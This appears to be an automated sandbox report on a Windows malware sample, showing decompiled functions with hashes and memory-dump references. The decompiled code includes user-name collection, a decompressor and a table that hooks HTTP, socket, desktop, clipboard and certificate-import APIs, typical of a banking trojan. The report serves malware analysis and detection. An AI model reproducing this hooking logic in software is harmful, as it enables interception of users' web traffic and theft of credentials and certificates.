0x0040d9c1
0x0040da1c
0x0040da22
0x00000000
0x0040da2e
0x0040da2e
0x0040da33
0x0040da37
0x0040da3f
0x00000000
0x0040da3f
0x0040d8af
0x0040d8b4
0x00000000
0x0040d8b6
0x0040d8b6
0x00000000
0x0040d8b6

APIs

CoCreateInstance.OLE32(004015E0,00000000,00004401,004015C0,?,?,00000000,00000001), ref: 0040D8A5

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 1dfa82feef131e62f558c75012fe6b42b42fbc55345881df74d2fd67fc07cc19
Instruction ID: 3d507e5e017a6c00000d42aa9d2094781beee0e6255f6b25561ffc08421863d4
Opcode Fuzzy Hash: 1dfa82feef131e62f558c75012fe6b42b42fbc55345881df74d2fd67fc07cc19
Instruction Fuzzy Hash: 1C515E71E00209ABDB14DBA5C884AEFB778AF89714F1444AAE502FB2C0D779AD45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040C68A, Relevance: 1.5, APIs: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040C68A(signed short* __eax, void* __ecx) {
				signed int _v8;
				void* __esi;
				signed int* _t7;
				void* _t8;
				signed short* _t9;
				signed int _t10;
				signed int _t13;
				signed short _t14;
				void* _t15;

				_t16 = __eax;
				_t7 =  &_v8;
				_v8 = 0x104;
				__imp__GetUserNameExW(2, __eax, _t7, _t15, __ecx);
				if(_t7 == 0) {
					L8:
					_t8 = 6;
					_t9 = E00419DD3(_t8, _t16);
				} else {
					_t10 = _v8;
					if(_t10 == 0) {
						goto L8;
					} else {
						 *((short*)(__eax + _t10 * 2)) = 0;
						_t9 = __eax;
						if( *((intOrPtr*)(__eax)) != 0) {
							do {
								_t13 =  *_t9 & 0x0000ffff;
								if(_t13 == 0x2f || _t13 == 0x5c) {
									_t14 = 0x7c;
									 *_t9 = _t14;
								}
								_t9 =  &(_t9[1]);
							} while ( *_t9 != 0);
						}
					}
				}
				return _t9;
			}

0x0040c68f
0x0040c691
0x0040c698
0x0040c69f
0x0040c6a7
0x0040c6db
0x0040c6dd
0x0040c6de
0x0040c6a9
0x0040c6a9
0x0040c6ae
0x00000000
0x0040c6b0
0x0040c6b2
0x0040c6b6
0x0040c6bb
0x0040c6bd
0x0040c6bd
0x0040c6c3
0x0040c6cc
0x0040c6cd
0x0040c6cd
0x0040c6d0
0x0040c6d3
0x0040c6d9
0x0040c6bb
0x0040c6ae
0x0040c6e5

APIs

GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,0040C7E1,?,?,00000000), ref: 0040C69F

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 4cb97be1e9a826bdf7c54d124cf3e6fa5b999c6210462e6af6d91133ba36fdba
Instruction ID: 9dd4bf77991b7afd77c0f7f97a268e03f4dddc66e0949c8c46e640e53f07d306
Opcode Fuzzy Hash: 4cb97be1e9a826bdf7c54d124cf3e6fa5b999c6210462e6af6d91133ba36fdba
Instruction Fuzzy Hash: F1F0F061A00204EBDB345B14D9826BB73A8DF05750F101A6BE402EB3E0E6BA8E80829C

Uniqueness

Uniqueness Score: -1.00%

Function 00411AEB, Relevance: 1.5, APIs: 1, Instructions: 20
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411AEB() {
				long _t7;
				signed int _t8;
				intOrPtr _t9;
				void* _t11;
				void* _t13;

				_t11 = _t13 - 0x78;
				_t7 = GetTimeZoneInformation(_t11 - 0x34);
				if(_t7 != 1) {
					if(_t7 != 2) {
						_t8 = 0;
					} else {
						_t9 =  *((intOrPtr*)(_t11 + 0x74));
						goto L4;
					}
				} else {
					_t9 =  *((intOrPtr*)(_t11 + 0x20));
					L4:
					_t8 = (_t9 +  *(_t11 - 0x34)) * 0xffffffc4;
				}
				return _t8;
			}

0x00411aec
0x00411afa
0x00411b03
0x00411b0d
0x00411b1a
0x00411b0f
0x00411b0f
0x00000000
0x00411b0f
0x00411b05
0x00411b05
0x00411b12
0x00411b15
0x00411b15
0x00411b20

APIs

GetTimeZoneInformation.KERNEL32(?), ref: 00411AFA

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: InformationTimeZone
String ID:
API String ID: 565725191-0
Opcode ID: 2a55a243ab2abbf9882b30ada1f5b41ab5b97e86c2b4544ab809521e881b75ca
Instruction ID: 1831d4b0a1e879b6d6d37170985ca7b7b76512fc39886858982c11b8fed315f5
Opcode Fuzzy Hash: 2a55a243ab2abbf9882b30ada1f5b41ab5b97e86c2b4544ab809521e881b75ca
Instruction Fuzzy Hash: 5CE08C31B081088BDB24DFB4EE818DD77F9EB14304F310912F242E71A0F328FA868A06

Uniqueness

Uniqueness Score: -1.00%

Function 00412B72, Relevance: 1.3, Strings: 1, Instructions: 70
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00412B72() {
				signed int _t23;
				signed int _t59;
				signed int* _t63;
				signed int _t64;

				_t23 =  *0x423c60;
				if(_t23 >= 0x270) {
					_t64 = 0;
					do {
						_t59 = _t64;
						_t64 = _t64 + 1;
						0x423290[_t59] = (( *(0x423294 + _t59 * 4) ^ 0x423290[_t59]) & 0x7fffffff ^ 0x423290[_t59]) >> 0x00000001 ^  *(0x422000 + ((( *(0x423294 + _t59 * 4) ^ 0x423290[_t59]) & 0x7fffffff ^ 0x423290[_t59]) & 0x00000001) * 4) ^  *(0x4238c4 + _t59 * 4);
					} while (_t64 < 0xe3);
					if(_t64 < 0x26f) {
						_t63 =  &(0x423290[_t64]);
						do {
							 *_t63 =  *(0x422000 + ((( *_t63 ^ _t63[1]) & 0x7fffffff ^  *_t63) & 0x00000001) * 4) ^  *(_t63 - 0x38c) ^ (( *_t63 ^ _t63[1]) & 0x7fffffff ^  *_t63) >> 0x00000001;
							_t63 =  &(_t63[1]);
						} while (_t63 < 0x423c4c);
					}
					 *0x423c4c = (( *0x423290 ^  *0x423c4c) & 0x7fffffff ^  *0x423c4c) >> 0x00000001 ^  *(0x422000 + ((( *0x423290 ^  *0x423c4c) & 0x7fffffff ^  *0x423c4c) & 0x00000001) * 4) ^  *0x4238c0;
					_t23 = 0;
				}
				 *0x423c60 = _t23 + 1;
				return (0x423290[_t23] ^ 0x423290[_t23] >> 0x0000000b ^ ((0x423290[_t23] ^ 0x423290[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x423290[_t23] ^ 0x423290[_t23] >> 0x0000000b ^ ((0x423290[_t23] ^ 0x423290[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f) >> 0x00000012 ^ 0x423290[_t23] ^ 0x423290[_t23] >> 0x0000000b ^ ((0x423290[_t23] ^ 0x423290[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x423290[_t23] ^ 0x423290[_t23] >> 0x0000000b ^ ((0x423290[_t23] ^ 0x423290[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f;
			}

0x00412b72
0x00412b7c
0x00412b84
0x00412b8b
0x00412b8b
0x00412bb9
0x00412bba
0x00412bc1
0x00412bcf
0x00412bd1
0x00412bd8
0x00412bf7
0x00412bf9
0x00412bfc
0x00412bd8
0x00412c2b
0x00412c30
0x00412c30
0x00412c3a
0x00412c65

Strings

L<B, xrefs: 00412BFC

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: L<B
API String ID: 0-1843459317
Opcode ID: 99631c4a65281f024962d23a1623936d98afda4a22f86701fd598ee8b753705c
Instruction ID: 7f30fc6bda19414016523a02a442cfc663ba3b7f74aaf8ed96acea66fa0897d3
Opcode Fuzzy Hash: 99631c4a65281f024962d23a1623936d98afda4a22f86701fd598ee8b753705c
Instruction Fuzzy Hash: BD217F323204048BD768DF39EC59A4933E2E7893197A5847DD215D32A0EA7CEA13CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 004021EB, Relevance: .2, Instructions: 236
COMMONCrypto

Download Yara Rule

C-Code - Quality: 77%

			E004021EB(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr* __esi, void* __fp0) {
				intOrPtr* _t95;
				void* _t96;
				void* _t98;
				intOrPtr* _t100;
				void* _t102;
				intOrPtr* _t104;
				signed char _t111;
				signed char _t112;
				signed char _t113;
				signed char _t114;
				signed char _t127;
				signed char _t128;
				signed char _t132;
				signed char _t133;
				void* _t165;
				void* _t168;
				intOrPtr* _t169;
				void* _t170;
				void* _t171;
				intOrPtr* _t172;
				intOrPtr* _t187;
				intOrPtr* _t188;
				void* _t189;
				intOrPtr* _t191;
				signed char _t195;
				intOrPtr* _t205;
				signed char _t213;
				signed char _t217;
				intOrPtr* _t224;
				intOrPtr* _t225;
				void* _t226;
				intOrPtr* _t229;
				void* _t230;
				intOrPtr* _t232;
				intOrPtr* _t233;
				void* _t236;
				intOrPtr* _t237;
				void* _t239;
				void* _t241;
				void* _t242;
				void* _t243;
				void* _t245;
				void* _t246;
				void* _t249;
				void* _t251;
				void* _t252;
				void* _t253;
				void* _t254;

				_t232 = __esi;
				_t168 = __ebx;
				_t205 = __edx + __ecx;
				 *__eax =  *__eax + __ebx;
				_t253 = _t252 + __ecx;
				 *_t205 =  *_t205 + __ebx;
				 *__esi =  *__esi + __ecx;
				_t95 = __eax + _t205;
				 *_t95 =  *_t95 + _t205;
				 *((intOrPtr*)(__ebx + 1)) =  *((intOrPtr*)(__ebx + 1)) + _t95;
				asm("rol byte [ecx], cl");
				_t224 = __edi + __ecx + 1;
				_t242 = _t241 + _t205;
				 *((intOrPtr*)(_t95 + 1)) =  *((intOrPtr*)(_t95 + 1)) + _t205;
				_pop(_t96);
				_t187 = __ecx + _t205 + __ebx;
				_t5 = __esi + 1;
				 *_t5 =  *((intOrPtr*)(__esi + 1)) + _t242;
				asm("fild dword [ecx]");
				if( *_t5 >= 0) {
					asm("fiadd word [ecx]");
				}
				 *((intOrPtr*)(_t205 + 1)) =  *((intOrPtr*)(_t205 + 1)) + _t253;
				asm("loopne 0x3");
				_push(_t242);
				_t169 = _t168 + _t253;
				 *_t169 =  *_t169 + _t96;
				_t243 = _t242 + _t253;
				 *_t205 =  *_t205 + _t224;
				_t233 = _t232 + _t253;
				 *_t224 =  *_t224 + _t96;
				 *0x1901ea01 =  *0x1901ea01 + _t187;
				_t254 = _t253 + _t243;
				 *_t169 =  *_t169 + _t169;
				_t225 = _t224 + _t243;
				 *_t225 =  *_t225 + _t187;
				_t98 = _t96 + _t243 + _t233;
				 *_t187 =  *_t187 + _t205;
				_t188 = _t187 + _t233;
				 *((intOrPtr*)(_t188 + _t98 - 0xe)) =  *((intOrPtr*)(_t188 + _t98 - 0xe)) + _t98;
				 *((intOrPtr*)(_t98 + 1)) =  *((intOrPtr*)(_t98 + 1)) + _t188;
				asm("cmc");
				 *((intOrPtr*)(_t188 + 1)) =  *((intOrPtr*)(_t188 + 1)) + _t205;
				asm("clc");
				 *((intOrPtr*)(_t188 + 1)) =  *((intOrPtr*)(_t188 + 1)) + _t169;
				asm("stc");
				 *((intOrPtr*)(_t225 + 1)) =  *((intOrPtr*)(_t225 + 1)) + _t243;
				asm("sti");
				 *((intOrPtr*)(_t188 + 1)) =  *((intOrPtr*)(_t188 + 1)) + _t233;
				 *_t188 =  *_t188 + 1;
				asm("arpl [ecx], ax");
				 *_t188 =  *_t188 + 1;
				_t100 =  *0xa6012602 +  *((intOrPtr*)(_t188 +  *0xa6012602));
				_t170 = _t169 +  *_t233;
				 *((intOrPtr*)(_t205 + _t100 + 0x2b10134)) =  *((intOrPtr*)(_t205 + _t100 + 0x2b10134)) + _t243;
				asm("daa");
				 *((intOrPtr*)(_t233 - 0x46fedafe)) =  *((intOrPtr*)(_t233 - 0x46fedafe)) + _t233;
				 *((intOrPtr*)(_t170 - 0x43fee0fe)) =  *((intOrPtr*)(_t170 - 0x43fee0fe)) + _t225;
				_t189 = _t188 +  *_t100;
				_t102 = _t100 +  *_t100 + _t170;
				_t171 = _t170 +  *((intOrPtr*)(_t189 + _t102));
				asm("insb");
				_t172 = _t171 +  *((intOrPtr*)(_t189 + _t102 - 0x1b));
				_t236 = _t233 + _t100 + _t171 + _t254;
				_t191 = _t189 +  *_t172 +  *((intOrPtr*)(_t189 +  *_t172));
				_t245 = _t243 + _t205 +  *_t188 +  *0xa02c501 + _t236;
				_t104 = _t102 +  *_t191 + _t225;
				_t237 = _t236 + _t225;
				 *0xa3013803 = _t104;
				asm("movsd");
				_t246 = _t245 +  *_t104;
				 *((intOrPtr*)(_t237 - 0x55fec4fd)) =  *((intOrPtr*)(_t237 - 0x55fec4fd)) + _t254;
				 *((intOrPtr*)(_t172 +  *0x6d02fd01 +  *((intOrPtr*)(_t245 + 1)) - 0x53feddfd)) =  *((intOrPtr*)(_t172 +  *0x6d02fd01 +  *((intOrPtr*)(_t245 + 1)) - 0x53feddfd)) + _t246;
				_push(_t225);
				 *((intOrPtr*)(_t246 - 0x49fed6fd)) =  *((intOrPtr*)(_t246 - 0x49fed6fd)) + _t237;
				_t226 = _t225 +  *((intOrPtr*)(_t191 + _t104));
				 *((intOrPtr*)(3 + _t104 + 0x3bd0167)) =  *((intOrPtr*)(3 + _t104 + 0x3bd0167)) + _t226;
				 *((intOrPtr*)(_t226 - 0x3ffeb4fd)) =  *((intOrPtr*)(_t226 - 0x3ffeb4fd)) + _t226;
				asm("rol byte [ebx], cl");
				_t239 = _t237 +  *_t237 +  *0xFFFFFFFFBB011304;
				_push(0x6a03de01);
				_t229 = _t226 + _t104 +  *_t104 + _t191 + _t254 +  *((intOrPtr*)(_t237 + 1)) +  *3 + _t191 - 1;
				_t249 = _t246 +  *_t237 +  *0xbb011303 +  *_t229;
				_t213 = 0xffffffffbb011302 +  *_t237 +  *_t229;
				_t230 = _t229 + _t249;
				asm("repne add ecx, [ebp+0x1]");
				asm("repe add esi, [edi]");
				_t195 = _t191 + 0xffffffff76022609 + _t239 + _t230;
				asm("std");
				_t251 = _t249 +  *((intOrPtr*)(0xffffffffbb011306)) +  *((intOrPtr*)(_t195 + 1));
				 *((char*)(0xffffffffbb011306)) =  *((char*)(0xffffffffbb011306)) + 1;
				_t111 = 0x3e +  *_t195 * 0x7e;
				 *(_t195 - 0x5dcffdfc) =  *(_t195 - 0x5dcffdfc) & _t111;
				_t112 = _t111 + 0xc;
				 *0xFFFFFFFF5F31200A =  *0xFFFFFFFF5F31200A ^ _t112;
				_t113 = _t112 + 1;
				 *(_t251 - 0x59cf04fc) =  *(_t251 - 0x59cf04fc) ^ _t113;
				_t114 = _t113 + 0xf2;
				 *(_t230 - 0x57cf5efc) =  *(_t230 - 0x57cf5efc) ^ _t114;
				 *(_t195 - 0x55cf5afc) =  *(_t195 - 0x55cf5afc) ^ _t195;
				 *0xFFFFFFFF6731BC0A =  *0xFFFFFFFF6731BC0A ^ _t195;
				 *(_t251 - 0x51cf1afc) =  *(_t251 - 0x51cf1afc) ^ _t195;
				 *(_t230 - 0x4fcf3cfc) =  *(_t230 - 0x4fcf3cfc) ^ _t195;
				 *(_t195 - 0x4dcf5dfc) =  *(_t195 - 0x4dcf5dfc) ^ _t213;
				 *0xFFFFFFFF6F31B90A =  *0xFFFFFFFF6F31B90A ^ _t213;
				 *(_t251 - 0x49cf55fc) =  *(_t251 - 0x49cf55fc) ^ _t213;
				 *(_t230 - 0x47cf52fc) =  *(_t230 - 0x47cf52fc) ^ _t213;
				 *(_t195 - 0x45cf4efc) =  *(_t195 - 0x45cf4efc) ^ 0xffffffffbb011306;
				 *0xFFFFFFFF7731C80A =  *0xFFFFFFFF7731C80A ^ 0xffffffffbb011306;
				 *(_t251 - 0x41cf46fc) =  *(_t251 - 0x41cf46fc) ^ 0xffffffffbb011306;
				 *(_t230 - 0x3fcf42fc) =  *(_t230 - 0x3fcf42fc) ^ 0xffffffffbb011306;
				_t127 = _t114 + 0x99a;
				_t128 = _t127 + 0xc1;
				_t132 = (_t128 + 0x18a ^ _t128 + 0x18a) + 0xc8;
				_t133 = _t132 + 0xca;
				_t217 = _t213 ^ _t128 ^ _t133 ^ 0;
				_t165 = ((((((_t133 + 0x197 ^ _t195 ^ _t127 ^ _t132) + 0x33c ^ 0) + 0x366 ^ _t217) + 0x382 ^ 0) + 0x39b ^ 0x00000003) + 0x3ae ^ 0) + 0x319;
				 *(_t251 + _t165 + 0x5bb060c) =  *(_t251 + _t165 + 0x5bb060c) ^ 0 ^ _t217 ^ 3;
				asm("sbb eax, [esi]");
				return _t165 + 0x05c20621 &  *(_t239 +  *0xFFFFFFFFBB011307);
			}

0x004021eb
0x004021eb
0x004021eb
0x004021ed
0x004021ef
0x004021f1
0x004021f5
0x004021f7
0x004021f9
0x004021fd
0x00402200
0x00402202
0x00402203
0x00402205
0x0040220a
0x0040220b
0x0040220d
0x0040220d
0x00402210
0x00402212
0x00402214
0x00402214
0x00402215
0x00402218
0x0040221a
0x0040221b
0x0040221d
0x0040221f
0x00402221
0x00402223
0x00402225
0x00402229
0x0040222f
0x00402231
0x00402233
0x00402235
0x00402237
0x00402239
0x0040223b
0x0040223d
0x00402241
0x00402244
0x00402245
0x00402248
0x00402249
0x0040224c
0x0040224d
0x00402250
0x00402251
0x00402254
0x00402256
0x00402258
0x00402261
0x00402269
0x0040226b
0x00402272
0x00402273
0x0040227b
0x00402289
0x0040228f
0x00402291
0x00402296
0x00402299
0x0040229f
0x004022a1
0x004022a3
0x004022a7
0x004022af
0x004022b4
0x004022bc
0x004022bd
0x004022bf
0x004022c7
0x004022d2
0x004022d3
0x004022d9
0x004022e3
0x004022eb
0x00402304
0x0040230d
0x00402312
0x0040231b
0x0040231d
0x00402321
0x00402323
0x0040232c
0x00402330
0x00402333
0x00402338
0x00402339
0x0040233c
0x00402341
0x00402343
0x00402349
0x0040234b
0x00402351
0x00402353
0x00402359
0x0040235b
0x00402363
0x0040236b
0x00402373
0x0040237b
0x00402383
0x0040238b
0x00402393
0x0040239b
0x004023a3
0x004023ab
0x004023b3
0x004023bb
0x004023c1
0x004023c5
0x004023d1
0x004023d5
0x004023f7
0x0040243d
0x0040243f
0x00402446
0x00402454

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30296fb46389e41053c9c1891a2e91179b26c183d1817db7ada92d60d53047d1
Instruction ID: ba034fe0260e76fb634bcbf44d86e0ca35d2e6c216dacbbe8ba02d624f1461b9
Opcode Fuzzy Hash: 30296fb46389e41053c9c1891a2e91179b26c183d1817db7ada92d60d53047d1
Instruction Fuzzy Hash: 9881C4319893918BCB95DF38C8D56D6BBB1EE4322432E85DDC8940EA03E22F651BDF51

Uniqueness

Uniqueness Score: -1.00%

Function 00414714, Relevance: .2, Instructions: 190
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00414714(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				unsigned int _t67;
				signed int _t68;
				intOrPtr _t71;
				void* _t79;
				signed int _t81;
				intOrPtr _t87;
				intOrPtr _t88;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				signed int _t101;
				signed int _t102;
				unsigned int _t103;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				signed int _t111;
				signed int _t115;
				signed int _t116;
				intOrPtr* _t119;
				unsigned int _t125;
				signed int _t126;
				signed int _t128;

				_t71 = _a4;
				_t98 = 0;
				_t99 = 0;
				_v16 = 0;
				_v20 = 1;
				L1:
				while(1) {
					if(_t99 == 0) {
						_t103 =  *(_t98 + _t71);
						_t98 = _t98 + 4;
						_t99 = 0x1f;
						_t104 = _t103 >> 0x1f;
					} else {
						_t99 = _t99 - 1;
						_t104 = _t67 >> _t99 & 0x00000001;
					}
					if(_t104 != 0) {
						_v16 = _v16 + 1;
						 *((char*)(_v16 + _a12)) =  *(_t98 + _t71);
						_t98 = _t98 + 1;
						L6:
						_t71 = _a4;
						continue;
					}
					_v12 = 1;
					do {
						if(_t99 == 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t100 = 0x1f;
							_t106 = _t67 >> 0x1f;
						} else {
							_t100 = _t99 - 1;
							_t106 = _t67 >> _t100 & 0x00000001;
						}
						_v12 = _t106 + _v12 * 2;
						if(_t100 == 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t99 = 0x1f;
							_t108 = _t67 >> 0x1f;
						} else {
							_t99 = _t100 - 1;
							_t108 = _t67 >> _t99 & 0x00000001;
						}
					} while (_t108 == 0);
					_t111 = _v12;
					if(_t111 == 2) {
						_t81 = _v20;
						L19:
						_v12 = _t81;
						if(_t99 == 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t101 = 0x1f;
							_v8 = _t67 >> 0x1f;
						} else {
							_t101 = _t99 - 1;
							_v8 = _t67 >> _t101 & 0x00000001;
						}
						if(_t101 == 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t99 = 0x1f;
							_t115 = _t67 >> 0x1f;
						} else {
							_t99 = _t101 - 1;
							_t115 = _t67 >> _t99 & 0x00000001;
						}
						_t116 = _t115 + _v8 * 2;
						_v8 = _t116;
						if(_t116 == 0) {
							_v8 = 1;
							do {
								if(_t99 == 0) {
									_t125 =  *(_t98 + _t71);
									_t98 = _t98 + 4;
									_t102 = 0x1f;
									_t126 = _t125 >> 0x1f;
								} else {
									_t102 = _t99 - 1;
									_t126 = _t67 >> _t102 & 0x00000001;
								}
								_v8 = _t126 + _v8 * 2;
								if(_t102 == 0) {
									_t67 =  *(_t98 + _t71);
									_t98 = _t98 + 4;
									_t99 = 0x1f;
									_t128 = _t67 >> 0x1f;
								} else {
									_t99 = _t102 - 1;
									_t128 = _t67 >> _t99 & 0x00000001;
								}
							} while (_t128 == 0);
							_v8 = _v8 + 2;
						}
						asm("sbb ecx, ecx");
						_v8 = _v8 +  ~0xd00;
						_t87 = _v16;
						_t119 = _t87 - _v12 + _a12;
						_v16 = _t119;
						 *((char*)(_t87 + _a12)) =  *_t119;
						_t88 = _t87 + 1;
						_v16 = _v16 + 1;
						do {
							 *((char*)(_t88 + _a12)) =  *_v16;
							_t88 = _t88 + 1;
							_v16 = _v16 + 1;
							_t57 =  &_v8;
							 *_t57 = _v8 - 1;
						} while ( *_t57 != 0);
						_v16 = _t88;
						goto L6;
					}
					_t79 = ( *(_t98 + _t71) & 0x000000ff) + (_t111 + 0xfffffffd << 8);
					_t98 = _t98 + 1;
					if(_t79 != 0xffffffff) {
						_t81 = _t79 + 1;
						_v20 = _t81;
						goto L19;
					}
					_t68 = _a16;
					 *_t68 = _v16;
					return _t68 & 0xffffff00 | _t98 == _a8;
				}
			}

0x0041471b
0x0041471f
0x00414724
0x00414726
0x00414729
0x00000000
0x00414730
0x00414732
0x00414745
0x00414747
0x0041474a
0x0041474b
0x00414734
0x00414734
0x0041473b
0x0041473b
0x00414750
0x0041475b
0x0041475e
0x00414761
0x00414762
0x00414762
0x00000000
0x00414762
0x00414767
0x0041476e
0x00414770
0x0041477e
0x00414785
0x00414788
0x00414789
0x00414772
0x00414772
0x00414779
0x00414779
0x00414792
0x00414797
0x004147a5
0x004147ac
0x004147af
0x004147b0
0x00414799
0x00414799
0x004147a0
0x004147a0
0x004147b3
0x004147b7
0x004147bd
0x004147bf
0x004147de
0x004147de
0x004147e3
0x004147f4
0x004147f9
0x00414801
0x00414802
0x004147e5
0x004147e5
0x004147ef
0x004147ef
0x00414807
0x00414815
0x0041481c
0x0041481f
0x00414820
0x00414809
0x00414809
0x00414810
0x00414810
0x00414826
0x00414829
0x0041482e
0x00414830
0x00414837
0x00414839
0x0041484c
0x0041484e
0x00414851
0x00414852
0x0041483b
0x0041483b
0x00414842
0x00414842
0x0041485b
0x00414860
0x0041486e
0x00414875
0x00414878
0x00414879
0x00414862
0x00414862
0x00414869
0x00414869
0x0041487c
0x00414880
0x00414880
0x0041488c
0x00414890
0x00414893
0x0041489b
0x004148a0
0x004148a6
0x004148a9
0x004148aa
0x004148ad
0x004148b5
0x004148b8
0x004148b9
0x004148bc
0x004148bc
0x004148bc
0x004148c1
0x00000000
0x004148c1
0x004147ce
0x004147d0
0x004147d4
0x004147da
0x004147db
0x00000000
0x004147db
0x004148c9
0x004148d4
0x004148db
0x004148db

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f4b364eb5e01cb4963202215bd9b16e8fc03a0e04bf887195a9ff215a63561e
Instruction ID: ce87c902909f0050b0a66e94c6c2cd8e60c2d74f0c551077053abc404cf98c6b
Opcode Fuzzy Hash: 4f4b364eb5e01cb4963202215bd9b16e8fc03a0e04bf887195a9ff215a63561e
Instruction Fuzzy Hash: 8651BF36E00A259BDB14CE58C4502EDF7B1AFC6724F1A42AACD16BF385D774AD81CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00419823, Relevance: .1, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00419823() {
				void* __ebx;
				intOrPtr _t1;
				signed int _t55;
				void* _t57;
				void* _t58;

				_t1 =  *0x422554;
				if(_t1 == 0) {
					_t1 =  *0x422550;
					 *0x42200c = E00408D01;
				} else {
					 *0x42200c = E00408DB8;
				}
				 *0x422008 = _t1;
				 *0x422018 =  *0x422560;
				 *0x422028 = GetFileAttributesExW;
				 *0x422038 = HttpSendRequestW;
				 *0x422048 = HttpSendRequestA;
				 *0x422058 = HttpSendRequestExW;
				 *0x422068 = HttpSendRequestExA;
				 *0x422078 = InternetCloseHandle;
				 *0x422088 = InternetReadFile;
				 *0x422098 = __imp__InternetReadFileExA;
				 *0x4220a8 = InternetQueryDataAvailable;
				 *0x4220b8 = HttpQueryInfoA;
				 *0x4220c8 = __imp__#3;
				 *0x4220d8 = __imp__#19;
				 *0x4220e8 = __imp__WSASend;
				 *0x4220f8 = OpenInputDesktop;
				 *0x422108 = SwitchDesktop;
				 *0x422118 = DefWindowProcW;
				 *0x422128 = DefWindowProcA;
				 *0x422138 = DefDlgProcW;
				 *0x422148 = DefDlgProcA;
				 *0x422158 = DefFrameProcW;
				 *0x422168 = DefFrameProcA;
				 *0x422178 = DefMDIChildProcW;
				 *0x422188 = DefMDIChildProcA;
				 *0x422198 = CallWindowProcW;
				 *0x4221a8 = CallWindowProcA;
				 *0x4221b8 = RegisterClassW;
				 *0x4221c8 = RegisterClassA;
				 *0x4221d8 = RegisterClassExW;
				 *0x4221e8 = RegisterClassExA;
				 *0x4221f8 = BeginPaint;
				 *0x422208 = EndPaint;
				 *0x422218 = GetDCEx;
				 *0x422228 = GetDC;
				 *0x422238 = GetWindowDC;
				 *0x422248 = ReleaseDC;
				 *0x422258 = GetUpdateRect;
				 *0x422268 = GetUpdateRgn;
				 *0x422278 = GetMessagePos;
				 *0x422288 = GetCursorPos;
				 *0x422298 = SetCursorPos;
				 *0x4222a8 = SetCapture;
				 *0x4222b8 = ReleaseCapture;
				 *0x4222c8 = GetCapture;
				 *0x4222d8 = GetMessageW;
				 *0x4222e8 = GetMessageA;
				 *0x4222f8 = PeekMessageW;
				 *0x422308 = PeekMessageA;
				 *0x422318 = TranslateMessage;
				_push(0x422008);
				 *0x422328 = GetClipboardData;
				_t55 = 0x34;
				 *0x422338 = __imp__PFXImportCertStore;
				return E00419792(_t55, _t57, _t58);
			}

0x00419823
0x0041982a
0x00419838
0x0041983d
0x0041982c
0x0041982c
0x0041982c
0x00419847
0x00419851
0x0041985b
0x00419865
0x0041986f
0x00419879
0x00419883
0x0041988d
0x00419897
0x004198a1
0x004198ab
0x004198b5
0x004198bf
0x004198c9
0x004198d3
0x004198dd
0x004198e7
0x004198f1
